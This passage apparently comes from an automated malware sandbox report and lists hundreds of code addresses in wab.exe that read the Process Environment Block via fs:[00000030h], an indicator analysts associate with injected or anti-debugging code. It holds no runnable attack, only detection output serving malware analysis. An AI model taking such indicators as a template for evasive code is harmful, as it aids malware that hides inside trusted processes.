Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A020 mov eax, dword ptr fs:[00000030h]	26_2_21C7A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C020 mov eax, dword ptr fs:[00000030h]	26_2_21C7C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B3D0 mov ecx, dword ptr fs:[00000030h]	26_2_21D3B3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D063C0 mov eax, dword ptr fs:[00000030h]	26_2_21D063C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C3CD mov eax, dword ptr fs:[00000030h]	26_2_21D3C3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D553FC mov eax, dword ptr fs:[00000030h]	26_2_21D553FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB63FF mov eax, dword ptr fs:[00000030h]	26_2_21CB63FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]	26_2_21CA438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]	26_2_21CA438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]	26_2_21CB33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]	26_2_21CB33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA33A5 mov eax, dword ptr fs:[00000030h]	26_2_21CA33A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov ecx, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]	26_2_21C79353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]	26_2_21C79353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55341 mov eax, dword ptr fs:[00000030h]	26_2_21D55341
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2437C mov eax, dword ptr fs:[00000030h]	26_2_21D2437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F367 mov eax, dword ptr fs:[00000030h]	26_2_21D3F367
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C310 mov ecx, dword ptr fs:[00000030h]	26_2_21C7C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA0310 mov ecx, dword ptr fs:[00000030h]	26_2_21CA0310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF32A mov eax, dword ptr fs:[00000030h]	26_2_21CAF32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C77330 mov eax, dword ptr fs:[00000030h]	26_2_21C77330
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]	26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]	26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]	26_2_21C892C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]	26_2_21C892C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]	26_2_21CAF2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]	26_2_21CAF2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F2F8 mov eax, dword ptr fs:[00000030h]	26_2_21D3F2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D552E2 mov eax, dword ptr fs:[00000030h]	26_2_21D552E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C792FF mov eax, dword ptr fs:[00000030h]	26_2_21C792FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]	26_2_21CBE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]	26_2_21CBE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]	26_2_21CB329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]	26_2_21CB329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55283 mov eax, dword ptr fs:[00000030h]	26_2_21D55283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]	26_2_21C902A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]	26_2_21C902A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov ecx, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]	26_2_21D172A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]	26_2_21D172A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]	26_2_21D3B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]	26_2_21D3B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB724D mov eax, dword ptr fs:[00000030h]	26_2_21CB724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]	26_2_21C79240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]	26_2_21C79240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86259 mov eax, dword ptr fs:[00000030h]	26_2_21C86259
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D08243 mov eax, dword ptr fs:[00000030h]	26_2_21D08243
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D08243 mov ecx, dword ptr fs:[00000030h]	26_2_21D08243
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A250 mov eax, dword ptr fs:[00000030h]	26_2_21C7A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7826B mov eax, dword ptr fs:[00000030h]	26_2_21C7826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]	26_2_21CC1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]	26_2_21CC1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA9274 mov eax, dword ptr fs:[00000030h]	26_2_21CA9274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]	26_2_21CB7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]	26_2_21CB7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55227 mov eax, dword ptr fs:[00000030h]	26_2_21D55227
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7823B mov eax, dword ptr fs:[00000030h]	26_2_21C7823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]	26_2_21CBE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]	26_2_21CBE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB55C0 mov eax, dword ptr fs:[00000030h]	26_2_21CB55C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA95DA mov eax, dword ptr fs:[00000030h]	26_2_21CA95DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C865D0 mov eax, dword ptr fs:[00000030h]	26_2_21C865D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D555C9 mov eax, dword ptr fs:[00000030h]	26_2_21D555C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD5D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CFD5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]	26_2_21CBC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]	26_2_21CBC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C825E0 mov eax, dword ptr fs:[00000030h]	26_2_21C825E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB4588 mov eax, dword ptr fs:[00000030h]	26_2_21CB4588
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]	26_2_21D0B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]	26_2_21D0B594
